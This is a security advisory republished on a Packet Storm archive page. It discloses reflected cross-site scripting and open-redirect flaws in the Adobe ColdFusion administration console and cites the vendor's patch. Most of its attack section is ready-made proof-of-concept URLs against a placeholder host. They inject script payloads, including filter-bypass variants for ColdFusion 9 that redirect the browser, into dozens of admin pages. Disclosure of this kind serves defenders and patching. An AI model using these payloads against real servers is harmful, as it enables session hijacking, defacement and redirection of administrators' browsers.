what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Adobe ColdFusion Cross Site Scripting

Adobe ColdFusion Cross Site Scripting
Posted Mar 16, 2011
Authored by ProCheckUp, Richard Brain | Site procheckup.com

Adobe ColdFusion suffers from multiple cross site scripting and information disclosure vulnerabilities in the administration console.

tags | exploit, vulnerability, xss, info disclosure
SHA-256 | d873c49e2d5b51031c48ef05bac08618d85d900ad26132a94d2342aa6e42ee80

Adobe ColdFusion Cross Site Scripting

Change Mirror Download
http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr10-08


PR10-08: Various XSS and information disclosure flaws within Adobe
ColdFusion administration console
Vulnerability found: 17th April 2010

Vendor informed: 19th April 2010

Vulnerability fixed: 8th February 2011

Severity: Medium/High

Description:
Adobe ColdFusion is an easy to use and very widely adopted Programming
language, Procheckup has discovered that the ColdFusion admin console
(and various programs within), are vulnerable to reflective XSS attacks.
The Admin console is normally accessed using a web browser over port
8500 (though this can be changed) or directly mapped onto a web server
directory by proxying cfm extensions.
Note: Tested on ColdFusion enterprise version 8.01 running on Windows
XP, and ColdFusion 7,8,9 running on Windows 2003 R2 SP2 server and
mapped to IIS 6.
Defaults were chosen with "server contained installation", and all
subcomponents.
Versions tested
ColdFusion MX7 7,0,0,91690 base patches
ColdFusion MX8 8,0,1,195765 base patches
ColdFusion MX8 8,0,1,195765 with Hotfix4
ColdFusion MX8 8,0,1,195765 with Hotfix4 and patches from security
Bulletin APSB10-11 shf8010001.jar and CFIDE-801.zip
ColdFusion 9 9,0,0,251028 base patches - ColdFusion 9 includes a simple
list of forbidden tags. So <script> cannot be used.
ColdFusion 9 9,0,0,251028 with Hotfix1 – ColdFusion 9 includes a simple
list of forbidden tags. So <script> cannot be used
The following demonstrate the XSS flaws:-

1) Unauthenticated vanilla XSS - ColdFusion 7 and ColdFusion 8. IE7
browser used.
http://target-domain.foo:8500/CFIDE/administrator/archives/index.cfm?browsesubmit=Browse+Server&mapping=&5921a"><script>alert(1)</script>3081b18fb95=1

Does not work with ColdFusion 7
http://target-domain.foo:8500/CFIDE/administrator/datasources/derbyEmbedded.cfm?dsn=cfartgallery&"><script>alert(1)</script>=1

http://target-domain.foo:8500/CFIDE/administrator/extensions/corbaedit.cfm?"><script>alert(1)</script>

http://target-domain.foo:8500/CFIDE/administrator/logviewer/searchlog.cfm?logfile="><script>alert(1)</script>

http://target-domain.foo:8500/CFIDE/administrator/settings/fonts.cfm?fontPath=555-555-0199@example.com&browsesubmit=Browse+Server&mapping=&5921a"><script>alert(1)</script>3081b18fb95=1

http://target-domain.foo:8500/CFIDE/administrator/settings/fonts.cfm?browsesubmit=Browse+Server&mapping=&5921a"><script>alert(1)</script>3081b18fb95=1

http://target-domain.foo:8500/CFIDE/administrator/settings/jvm.cfm?browsesubmit=Browse+Server&jvmArgs=-server+-Dsun.io.useCanonCaches%3dfalse+-XX%3aMaxPermSize%3d192m+-XX%3a%2bUseParallelGC+-Dcoldfusion.rootDir%3d%7bapplication.home%7d%2f..%2f+-Dcoldfusion.libPath%3d%7bapplication.home%7d%2f..%2flib&jdkPath=C%3a%2fColdFusion8%2fruntime%2fjre&minHeap=0&maxHeap=512&12bf2"><script>alert(1)</script>1fb5988b6d1

http://target-domain.foo:8500/CFIDE/administrator/settings/mappings.cfm?browsesubmit=Browse+Server&mapping=&5921a"><script>alert(1)</script>3081b18fb95=1

http://target-domain.foo:8500/CFIDE/administrator/settings/version.cfm?browsesubmit=Browse+Server&mapping=&5921a"><script>alert(1)</script>3081b18fb95=1

Works intermittently, or delayed response.
http://target-domain.foo:8500/CFIDE/administrator/analyzer/index.cfm?browsesubmit=Browse+Server&directory=C%3a%5cColdFusion8%5cwwwroot%5cCFIDE%5cadministrator%5canalyzerd590f"style%3d"x:expression(alert(1))"

COLDFUSION VERSION 9 – Variants which work with CF9 as do not use the
<script> tag
To circumvent this the <script>alert(1)</script> needs to be substituted
with a tag not on the match list
</XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")>
(this works on IE7 & IE6)

http://target-domain.foo/CFIDE/administrator/archives/index.cfm?browsesubmit=Browse+Server&mapping=&5921a"></XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")>3081b18fb95=1

http://target-domain.foo/CFIDE/administrator/datasources/derbyEmbedded.cfm?dsn=cfartgallery&"></XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")>=1

http://target-domain.foo/CFIDE/administrator/extensions/corbaedit.cfm?"></XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")>

http://target-domain.foo/CFIDE/administrator/logviewer/searchlog.cfm?logfile="></XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")>

http://target-domain.foo/CFIDE/administrator/settings/fonts.cfm?fontPath=555-555-0199@example.com&browsesubmit=Browse+Server&mapping=&5921a"></XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")>

http://target-domain.foo/CFIDE/administrator/settings/fonts.cfm?browsesubmit=Browse+Server&mapping=&5921a"></XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")>

http://target-domain.foo/CFIDE/administrator/settings/jvm.cfm?browsesubmit=Browse+Server&jvmArgs=-server+-Dsun.io.useCanonCaches%3dfalse+-XX%3aMaxPermSize%3d192m+-XX%3a%2bUseParallelGC+-Dcoldfusion.rootDir%3d%7bapplication.home%7d%2f..%2f+-Dcoldfusion.libPath%3d%7bapplication.home%7d%2f..%2flib&jdkPath=C%3a%2fColdFusion8%2fruntime%2fjre&minHeap=0&maxHeap=512&12bf2"></XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")>1

http://target-domain.foo/CFIDE/administrator/settings/mappings.cfm?browsesubmit=Browse+Server&mapping=&5921a"></XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")>3081b18fb95=1

http://target-domain.foo/CFIDE/administrator/settings/version.cfm?browsesubmit=Browse+Server&mapping=&5921a"></XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")>3081b18fb95=1

3) Authenticated vanilla XSS attacks.
IE7 +Firefox - authenticated
http://target-domain.foo:8500/CFIDE/administrator/extensions/appletedit.cfm?method=1&code=1&width=1&applet=1"><script>alert(1)</script>5d59011273e
IE7 - authenticated
http://target-domain.foo:8500/CFIDE/administrator/extensions/cfx_cppedit.cfm?PROCEDURE=ProcessTagRequestbaccd%22style%3d%22x:expression%28alert%281%29%29%221dcd653666d&TAGNAME=cfx_&CACHE=on&TreeSubmitApply=true

IE7 - authenticated – Does not work with ColdFusion 7
http://target-domain.foo:8500/CFIDE/administrator/eventgateway/gatewaytypes.cfm?typename=ActiveMQca235"style%3d"x:expression(alert(1))"6de21ab4628&action=edit

Takes a while to come back - authenticated
http://target-domain.foo:8500/CFIDE/administrator/settings/clientvariables.cfm?action=edit&store=Registrydb5a1"style%3d"x:expression(alert(1))"8d51e21067f


COLDFUSION VERSION 9 – Variants which work with CF9 as do not use the
<script> tag
To circumvent this the <script>alert(1)</script> needs to be substituted
with a tag not on the match list
</XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")>
(this works on IE7 & IE6)

http://target-domain.foo/CFIDE/administrator/extensions/appletedit.cfm?method=1&code=1&width=1&applet=1"></XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")>5d59011273e

http://target-domain.foo/CFIDE/administrator/extensions/cfx_cppedit.cfm?PROCEDURE=ProcessTagRequestbaccd%22style%3d%22x:expression%28alert%281%29%29%221dcd653666d&TAGNAME=cfx_&CACHE=on&TreeSubmitApply=true

http://target-domain.foo/CFIDE/administrator/eventgateway/gatewaytypes.cfm?typename=ActiveMQca235"style%3d"x:expression(alert(1))"6de21ab4628&action=edit

Takes a while to come back
http://target-domain.foo/CFIDE/administrator/settings/clientvariables.cfm?action=edit&store=Registrydb5a1"style%3d"x:expression(alert(1))"8d51e21067f

4) Authenticated vanilla XSS fixed in ColdFusion 8 hotfix 4 (works with
ColdFusion 8 and ColdFusion 7).

http://target-domain.foo:8500/CFIDE/administrator/datasources/index.cfm?locale=enb6f5d"style%3d"x:expression(alert(1))"24ac5d7bc65&VerifyAllDatasources=+Verify+All+Connections+
http://target-domain.foo:8500/CFIDE/administrator/eventgateway/gateways.cfm?gwid=SMS%20Menu%20App%20%2D%20555121268668"style%3d"x:expression(alert(1))"886b9fc22e4&action=edit

http://target-domain.foo:8500/CFIDE/administrator/j2eepackaging/editarchive.cfm?locale=en579a7"style%3d"x:expression(alert(1))"df5c8bdd5e9&addarchive=%a0+Add+%a0&archivename=Test+Me

Takes a while to come back
http://target-domain.foo:8500/CFIDE/administrator/settings/charting.cfm?browsesubmit=Browse+Server&CachePath=C%3a%5cJRun4%5cservers%5ccfusion%5ccfusion-ear%5ccfusion-war%5cWEB-INF%5ccfusion%5ccharting%5ccachef2250"style%3d"x:expression(alert(1))"7d1c33c9139&maxEngines=4&cacheSize=50&cacheType=1



Consequences:

An attacker may be able to cause execution of malicious scripting code
in the browser of a user who clicks on a link to an exposed ColdFusion
admin site. Such code would run within the security context of the
target domain. This type of attack can result in non-persistent
defacement of the target site, or the redirection of confidential
information (i.e.: session IDs) to unauthorised third parties.



Fix:
Apply patch as described in Adobe bulletin apsb11-04
http://www.adobe.com/support/security/bulletins/apsb11-04.html



4) Open redirection - fixed hot fix 4
http://target-domain.foo:8500/CFIDE/administrator/logging/archiveexecute.cfm?logfile=application%2Elog&return=true
Set the referer header..
Referer: http://www.procheckup.com

References:
http://www.procheckup.com/Vulnerabilities.php
http://www.adobe.com/support/security/bulletins/apsb11-04.html
http://www.securityfocus.com/bid/46273

Fix:
Apply patch as described in Adobe bulletin apsb11-04
http://www.adobe.com/support/security/bulletins/apsb11-04.html


Credits: Richard Brain of ProCheckUp Ltd (www.procheckup.com)


Legal:

Copyright 2010 Procheckup Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the
Internet community for the purpose of alerting them to problems, if and
only if, the Bulletin is not edited or changed in any way, is attributed
to Procheckup, and provided such reproduction and/or distribution is
performed for non-commercial purposes.

Any other use of this information is prohibited. Procheckup is not
liable for any misuse of this information by any third party.

Login or Register to add favorites

File Archive:

September 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    23 Files
  • 2
    Sep 2nd
    12 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    0 Files
  • 5
    Sep 5th
    10 Files
  • 6
    Sep 6th
    8 Files
  • 7
    Sep 7th
    30 Files
  • 8
    Sep 8th
    14 Files
  • 9
    Sep 9th
    26 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    5 Files
  • 13
    Sep 13th
    28 Files
  • 14
    Sep 14th
    15 Files
  • 15
    Sep 15th
    17 Files
  • 16
    Sep 16th
    9 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    12 Files
  • 20
    Sep 20th
    15 Files
  • 21
    Sep 21st
    20 Files
  • 22
    Sep 22nd
    13 Files
  • 23
    Sep 23rd
    12 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    30 Files
  • 27
    Sep 27th
    27 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close